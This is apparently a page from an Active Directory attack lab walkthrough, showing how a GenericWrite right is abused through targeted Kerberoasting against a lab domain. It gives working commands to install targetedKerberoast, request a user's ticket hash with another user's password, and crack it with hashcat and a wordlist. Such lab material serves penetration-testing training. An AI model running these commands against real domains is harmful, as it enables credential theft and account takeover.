Attacking Active Directory

GenericWrite on User (Hugo -> Ramon)

PreviousForceChangePassword on User (Donald-> Hugo)NextWriteDacl on User (Ramon-> Nicolas)

Last updated 1 year ago

As we just set up Hugo.Chavez's password we will now exploit the GenericWrite from hugo.Chavez to Ramon.Maldonado

This could be abuse with 3 different ways :
- shadowCredentials (windows server 2016 or +)
- targetKerberoasting (password should be weak enough to be cracked)
- logonScript (this need a user connection and to be honest it never worked or unless with a script already inside sysvol)

Target Kerberoasting

First let’s do a target Kerberoasting, the principle is simple. Add an SPN to the user, ask for a tgs, remove the SPN on the user.
And now we can crack the TGS just like a classic kerberoasting.
Shutdown have done a tool which do all the work for you : https://github.com/ShutdownRepo/targetedKerberoast

Install TargetedKerberoast.py

git clone https://github.com/ShutdownRepo/targetedKerberoast
cd targetedKerberoast
python3 targetedKerberoast.py

Get The Hash

python3 targetedKerberoast.py -v -d newyork.local -u hugo.Chavez -p 123456 --request-user Ramon.Maldonado

Crack Hash with RockYou.txt

hashcat -m 13100 -a 0 maldonado.hash rockyou.txt --force